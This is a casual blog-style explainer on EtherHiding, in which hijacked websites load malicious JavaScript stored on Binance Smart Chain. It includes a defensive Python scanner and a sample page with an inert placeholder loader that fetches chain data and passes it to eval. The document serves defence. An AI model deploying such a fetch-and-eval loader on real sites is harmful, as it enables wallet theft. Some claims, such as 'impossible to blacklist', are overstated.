Are you aware of EtherHiding? It is a smart and cunning tactic that North Korean hackers use to steal cryptocurrency and install malware. This is not your average phishing email scheme. Hackers carry out their hijinks by putting malicious code on the Binance Smart Chain (BSC), all to avoid detection by normal security tools - wild, right?
How EtherHiding works
So, how does it work? Hackers plant small snippets of code on trusted websites, and those snippets reference malware that is loaded from the blockchain itself. Because the payload arrives from what looks like a trusted third-party source, nothing seems amiss to the user, which makes this kind of attack increasingly good at evading detection. The malicious code is usually injected as browser JavaScript, so the attack vector goes unnoticed until you are already infected. Here are some of their clever tactics:
- Scripts that auto-update, altering their behavior in the moment.
- Using blockchain transactions to hide their malware, making these transactions impossible to blacklist.
- Attacking browser extensions, hot wallets, and DeFi applications, basically anywhere crypto is stored.
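The loader pattern described above (a snippet that reads from the chain and then runs what it fetched) is something a site audit can hunt for. As an added example that is not from the original article, here is a small Python heuristic that flags inline scripts combining a BSC/EVM RPC read with dynamic code execution; the sample page, its RPC hostname and its contract address are constructed placeholders.

```python
"""Heuristic scanner for EtherHiding-style loaders in page HTML (added example).
Flags an inline <script> only when it both reads from a BSC/EVM JSON-RPC endpoint
and executes the fetched text. Sample page, hostname and address are placeholders."""
import re
from html.parser import HTMLParser

# Indicator A: reads from the chain; indicator B: turns fetched text into running code.
CHAIN_READ = re.compile(r"eth_call|web3\.eth\.|ethers\.Contract|bsc-dataseed", re.I)
DYNAMIC_EXEC = re.compile(r"\beval\s*\(|new\s+Function\s*\(|document\.write\s*\(|"
                          r"createElement\(\s*['\"]script['\"]", re.I)

class _ScriptCollector(HTMLParser):
    def __init__(self):
        super().__init__()
        self.scripts, self._open = [], False  # script bodies in document order
    def handle_starttag(self, tag, attrs):
        if tag == "script":
            self.scripts.append("")
            self._open = True
    def handle_endtag(self, tag):
        if tag == "script":
            self._open = False
    def handle_data(self, data):
        if self._open:
            self.scripts[-1] += data

def scan_html(html):
    """Return [(script_index, [reasons])] for scripts matching both indicators."""
    parser = _ScriptCollector()
    parser.feed(html)
    findings = []
    for idx, body in enumerate(parser.scripts):
        reasons = []
        if CHAIN_READ.search(body):
            reasons.append("reads from an EVM chain RPC (eth_call / web3 / ethers)")
        if DYNAMIC_EXEC.search(body):
            reasons.append("executes fetched text (eval / Function / injected <script>)")
        if len(reasons) == 2:  # either indicator alone is common in legitimate dApps
            findings.append((idx, reasons))
    return findings

# Constructed sample: a benign script followed by an inert, placeholder-only loader.
SAMPLE_PAGE = """<html><head>
<script>document.getElementById('price').textContent = '...';</script>
<script>
  const rpc = 'https://bsc-rpc.example.invalid/';  // placeholder, not a real node
  const body = {method: 'eth_call', params: [{to: '0xPLACEHOLDER', data: '0x'}, 'latest']};
  fetch(rpc, {method: 'POST', body: JSON.stringify(body)})
    .then(r => r.json()).then(j => eval(decodeHex(j.result)));  // decodeHex: placeholder
</script></head></html>"""
```

Run `scan_html` over a crawled page's HTML; it reports only the second script of the sample, since the benign one matches neither indicator.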
Why Is This Important?
This is not just tech wizardry for wizardry's sake; it is malicious. Security teams constantly audit the websites and cloud systems of companies that handle crypto wallets, exchanges, and DeFi applications, yet there is always the chance that a mistake, even a small one, lets EtherHiding malware crawl through. Can you imagine diligently securing your crypto, only to have a malicious script hidden on the blockchain take all of it? Tough. Even more frightening is that these hackers can target anyone from a small crypto investor to large DeFi platforms. Their malware is hidden in a decentralized system like BSC, and traditional cybersecurity defenses have no chance of keeping up.
Ways to Protect Yourself
There is no “magic bullet” that completely eliminates EtherHiding, but there are steps you can take to protect yourself:
- Keep your browsers and extensions continually updated.
- Do not click on any unfamiliar links or download unverified scripts.
- If you provide crypto services, put real-time monitoring in place and audit your blockchain security protections.